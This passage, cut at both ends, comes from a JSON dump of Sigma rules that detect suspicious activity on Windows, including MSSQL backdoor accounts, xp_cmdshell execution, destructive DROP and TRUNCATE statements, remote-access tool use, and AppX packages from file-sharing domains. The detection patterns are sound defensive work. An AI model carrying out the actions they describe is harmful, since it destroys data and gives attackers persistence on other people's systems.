'\\AppData\\Local\\Temp\\WinGet\\'\n    filter_updhealthtools:\n        Data|contains: 'C:\\Windows\\TEMP\\UpdHealthTools.msi'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml",
    "content": "title: MSI Installation From Web\nid: 5594e67a-7f92-4a04-b65d-1a42fd824a60\nstatus: test\ndescription: Detects installation of a remote MSI file from the web.\nreferences:\n    - https://twitter.com/_st0pp3r_/status/1583922009842802689\nauthor: Stamatis Chatzimangou\ndate: 2022-10-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1218.007\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1040\n            - 1042\n        Data|contains: '://'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml",
    "content": "title: Atera Agent Installation\nid: 87261fb2-69d0-42fe-b9de-88c6b5f65a43\nstatus: test\ndescription: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators\nreferences:\n    - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent\nauthor: Bhabesh Raj\ndate: 2021-09-01\nmodified: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: MsiInstaller\n        Message|contains: AteraAgent\n    condition: selection\nfalsepositives:\n    - Legitimate Atera agent installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml",
    "content": "title: MSSQL Add Account To Sysadmin Role\nid: 08200f85-2678-463e-9c32-88dce2f073d1\nstatus: test\ndescription: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            - 'object_name:sysadmin'\n            - 'statement:alter server role [sysadmin] add member '\n    condition: selection\nfalsepositives:\n    - Rare legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_destructive_query.yml",
    "content": "title: MSSQL Destructive Query\nid: 00321fee-ca72-4cce-b011-5415af3b9960\nstatus: experimental\ndescription: |\n    Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as \"DROP TABLE\" or \"DROP DATABASE\".\nreferences:\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-database-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/truncate-table-transact-sql?view=sql-server-ver16\nauthor: Daniel Degasperi '@d4ns4n_'\ndate: 2025-06-04\ntags:\n    - attack.exfiltration\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event (event id 33205)'\ndetection:\n    selection:\n        Provider_Name: 'MSSQLSERVER$AUDIT'\n        EventID: 33205\n        Data|contains:\n            - 'statement:TRUNCATE TABLE'\n            - 'statement:DROP TABLE'\n            - 'statement:DROP DATABASE'\n    condition: selection\nfalsepositives:\n    - Legitimate transaction from a sysadmin.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml",
    "content": "title: MSSQL Disable Audit Settings\nid: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df\nstatus: test\ndescription: Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains:\n            - 'statement:ALTER SERVER AUDIT'\n            - 'statement:DROP SERVER AUDIT'\n    condition: selection\nfalsepositives:\n    - This event should only fire when an administrator is modifying the audit policy, which should be a rare occurrence once it's set up\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml",
    "content": "title: MSSQL Server Failed Logon\nid: 218d2855-2bba-4f61-9c85-81d0ea63ac71\nrelated:\n    - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d\n      type: similar\nstatus: test\ndescription: Detects failed logon attempts from clients to MSSQL server.\nreferences:\n    - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\n    - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nauthor: Nasreddine Bencherchali (Nextron Systems), j4son\ndate: 2023-10-11\nmodified: 2024-06-26\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: Must enable MSSQL authentication.'\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 18456\n    condition: selection\nfalsepositives:\n    - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml",
    "content": "title: MSSQL Server Failed Logon From External Network\nid: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d\nrelated:\n    - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71\n      type: similar\nstatus: test\ndescription: Detects failed logon attempts from clients with an external network IP to an MSSQL server. This can be a sign of a brute-force attack.\nreferences:\n    - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\n    - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nauthor: j4son\ndate: 2023-10-11\nmodified: 2025-05-28\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: Must enable MSSQL authentication.'\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 18456\n    filter_main_local_ips:\n        Data|contains:\n            - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8\n            - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12\n            - 'CLIENT: 172.17.'\n            - 'CLIENT: 172.18.'\n            - 'CLIENT: 172.19.'\n            - 'CLIENT: 172.20.'\n            - 'CLIENT: 172.21.'\n            - 'CLIENT: 172.22.'\n            - 'CLIENT: 172.23.'\n            - 'CLIENT: 172.24.'\n            - 'CLIENT: 172.25.'\n            - 'CLIENT: 172.26.'\n            - 'CLIENT: 172.27.'\n            - 'CLIENT: 172.28.'\n            - 'CLIENT: 172.29.'\n            - 'CLIENT: 172.30.'\n            - 'CLIENT: 172.31.'\n            - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16\n            - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8\n            - 'CLIENT: 169.254.' # filter_link-local_addressing: 169.254.0.0/16\n            - 'CLIENT: <local machine>'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml",
    "content": "title: MSSQL SPProcoption Set\nid: b3d57a5c-c92e-4b48-9a79-5f124b7cf964\nstatus: test\ndescription: Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy to monitor for \"sp_procoption\" must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            - 'object_name:sp_procoption'\n            - 'statement:EXEC'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the feature by administrators (rare)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml",
    "content": "title: MSSQL XPCmdshell Suspicious Execution\nid: 7f103213-a04e-4d59-8261-213dddf22314\nstatus: test\ndescription: Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-06-26\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy to monitor for \"xp_cmdshell\" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            # You can modify this to include specific commands\n            - 'object_name:xp_cmdshell'\n            - 'statement:EXEC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml",
    "content": "title: MSSQL XPCmdshell Option Change\nid: d08dd86f-681e-4a00-a92c-1db218754417\nstatus: test\ndescription: |\n    Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-06-26\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 15457\n        Data|contains: 'xp_cmdshell'\n    condition: selection\nfalsepositives:\n    - Legitimate enable/disable of the setting\n    - Note that since the event contains the change for both values, this rule will trigger on both enable and disable\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml",
    "content": "title: Remote Access Tool - ScreenConnect Command Execution\nid: 076ebe48-cc05-4d8f-9d41-89245cd93a14\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: Detects command execution via ScreenConnect RMM\nreferences:\n    - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        Provider_Name: 'ScreenConnect'\n        EventID: 200\n        Data|contains: 'Executed command of length'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml",
    "content": "title: Remote Access Tool - ScreenConnect File Transfer\nid: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: Detects file being transferred via ScreenConnect RMM\nreferences:\n    - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        Provider_Name: 'ScreenConnect'\n        EventID: 201\n        Data|contains: 'Transferred files with action'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml",
    "content": "title: Microsoft Malware Protection Engine Crash - WER\nid: 6c82cf5c-090d-4d57-9188-533577631108\nstatus: test\ndescription: This rule detects a suspicious crash of the Microsoft Malware Protection Engine\nreferences:\n    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\n    - https://technet.microsoft.com/en-us/library/security/4022344\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-09\nmodified: 2023-04-14\ntags:\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Windows Error Reporting'\n        EventID: 1001\n        Data|contains|all:\n            - 'MsMpEng.exe'\n            - 'mpengine.dll'\n    condition: selection\nfalsepositives:\n    - MsMpEng might crash if the \"C:\\\" partition is full\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/applocker/win_applocker_application_was_prevented_from_running.yml",
    "content": "title: AppLocker Prevented Application or Script from Running\nid: 401e5d00-b944-11ea-8f9a-00163ecd60ae\nstatus: test\ndescription: |\n    Detects when AppLocker prevents the execution of an Application, DLL, Script, MSI, or Packaged-App from running.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker\n    - https://nxlog.co/documentation/nxlog-user-guide/applocker.html\nauthor: Pushkarev Dmitry\ndate: 2020-06-28\nmodified: 2025-12-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.006\n    - attack.t1059.007\nlogsource:\n    product: windows\n    service: applocker\ndetection:\n    selection:\n        EventID:\n            - 8004 # EXE and DLL\n            - 8007 # MSI and Script\n            - 8022 # Packaged app execution\n            - 8025 # Packaged app deployment\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application execution. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml",
    "content": "title: Sysinternals Tools AppX Versions Execution\nid: d29a20b2-be4b-4827-81f2-3d8a59eab5fc\nstatus: test\ndescription: |\n    Detects execution of Sysinternals tools via an AppX package.\n    Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\nmodified: 2023-09-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    service: appmodel-runtime\ndetection:\n    selection:\n        EventID: 201\n        ImageName:\n            - 'procdump.exe'\n            - 'psloglist.exe'\n            - 'psexec.exe'\n            - 'livekd.exe'\n            - 'ADExplorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of sysinternals applications from the Windows Store will trigger this. Apply exclusions as needed.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml",
    "content": "title: Deployment AppX Package Was Blocked By AppLocker\nid: 6ae53108-c3a0-4bee-8f45-c7591a2c337f\nstatus: test\ndescription: Detects an appx package deployment that was blocked by AppLocker policy.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 412\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application deployment. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml",
    "content": "title: Remote AppX Package Downloaded from File Sharing or CDN Domain\nid: 8b48ad89-10d8-4382-a546-50588c410f0d\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages which was downloaded from a file sharing or CDN domain.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n        Path|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection\nfalsepositives:\n    - Unlikely, unless the organization uses file sharing or CDN services to distribute internal applications.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml",
    "content": "title: AppX Package Deployment Failed Due to Signing Requirements\nid: 898d5fc9-fbc3-43de-93ad-38e97237c344\nstatus: test\ndescription: |\n    Detects an appx package deployment / installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 401\n        ErrorCode: '0x80073cff' # Check ref section to learn more about this error code\n    condition: selection\nfalsepositives:\n    - Legitimate AppX packages not signed by MS that are used as part of an enterprise.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_in_staging_directory.yml",
    "content": "title: AppX Located in Known Staging Directory Added to Deployment Pipeline\nid: 5cdeaf3d-1489-477c-95ab-c318559fc051\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in a known folder often used as a staging directory.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection_eid:\n        EventID: 854\n    selection_paths_forward:\n        Path|contains: # Paths can be written using forward slash if the \"file://\" protocol is used\n            - ':/Perflogs/'\n            - ':/Users/Public/'\n            - ':/Windows/Temp/'\n            - '/AppData/Local/Temp/'\n            - '/Desktop/'\n            - '/Downloads/'\n    selection_paths_back:\n        Path|contains: # Same locations written with backslashes, as used for local paths\n            - ':\\PerfLogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: selection_eid and 1 of selection_paths_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml",
    "content": "title: Potential Malicious AppX Package Installation Attempts\nid: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce\nstatus: test\ndescription: Detects potential installation or installation attempts of known malicious appx packages\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n    - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-01-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID:\n            - 400\n            - 401\n        # Add more malicious package names\n        # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n        PackageFullName|contains: '3669e262-ec02-4e9d-bcb4-3d008b4afac9'\n    condition: selection\nfalsepositives:\n    - Rare occasions where a malicious package uses the exact same name and version as a legitimate application.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml",
    "content": "title: Deployment Of The AppX Package Was Blocked By The Policy\nid: e021bbb5-407f-41f5-9dc9-1864c45a7a51\nstatus: test\ndescription: |\n    Detects an appx package deployment that was blocked by the local computer policy.\n    The following events indicate that an AppX package deployment was blocked by a policy:\n    - Event ID 441: The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy\n    - Event ID 442: Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\n    - Event ID 453: Package blocked by a platform policy.\n    - Event ID 454: Package blocked by a platform policy.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID:\n            - 441 # The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy\n            - 442 # Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\n            - 453 # Package blocked by a platform policy\n            - 454 # Package blocked by a platform policy\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application deployment. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml",
    "content": "title: AppX Located in Uncommon Directory Added to Deployment Pipeline\nid: c977cb50-3dff-4a9f-b873-9290f56132f1\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in uncommon locations.\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n    filter_main_generic:\n        Path|contains:\n            # Paths can be written using forward slash if the \"file://\" protocol is used\n            - ':/Program%20Files' # Also covers 'file:///C:/Program%20Files%20(x86)/'\n            - ':/Windows/System32/'\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\ImmersiveControlPanel\\'\n            - ':\\Windows\\PrintDialog\\'\n            - ':\\Windows\\SystemApps\\'\n            - 'AppData/Local/Temp/WinGet/Microsoft.Winget.Source'\n            - 'x-windowsupdate://'\n    filter_main_specific:\n        Path|contains:\n            - 'https://installer.teams.static.microsoft/'\n            - 'https://res.cdn.office.net' # Example https://res.cdn.office.net/nativehost/5mttl/installer/v2/1.2025.617.100/Microsoft.OutlookForWindows_x64.msix\n            - 'https://statics.teams.cdn.live.net/'\n            - 'https://statics.teams.cdn.office.net/'\n            - 'microsoft.com' # Example: https://go.microsoft.com/fwlink/?linkid=2160968\n    filter_optional_onedrive:\n        Path|contains: 'AppData\\Local\\Microsoft\\OneDrive\\'\n    filter_optional_winget:\n        Path|contains:\n            - 'AppData/Local/Temp/WinGet/Microsoft.Winget.Source'\n            - 'AppData\\Local\\Temp\\WinGet\\Microsoft.Winget.Source'\n    filter_optional_x_windowsupdate:\n        Path|contains: 'x-windowsupdate://'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_full_trust_package_installation.yml",
    "content": "title: Windows AppX Deployment Full Trust Package Installation\nid: e54279c7-4910-4e2c-902c-c56a25b549f6\nstatus: experimental\ndescription: Detects the installation of MSIX/AppX packages with full trust privileges which run with elevated privileges outside normal AppX container restrictions\nreferences:\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1553.005\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 400\n        HasFullTrust: true\n    filter_main_legitpath:\n        PackageSourceUri|startswith:\n            - 'file:///C:/Program%20Files/'\n            - 'file:///C:/Program%20Files%20(x86)/'\n    filter_main_microsoft:\n        - PackageSourceUri|startswith: 'https://go.microsoft.com/fwlink/?linkid'\n        - PackageSourceUri|contains:\n              - '.cdn.microsoft.com'\n              - '.cdn.office.net/'\n    filter_main_callerprocess:\n        CallingProcess|startswith:\n            - 'sysprep.exe'\n            - 'svchost.exe,AppReadiness'\n    filter_optional_x_update:\n        PackageSourceUri|startswith: 'x-windowsupdate://'\n    filter_optional_microsoftclient:\n        PackageFullName|startswith: 'MicrosoftWindows.Client.'\n    condition: selection and not 1 of filter_main_* and not 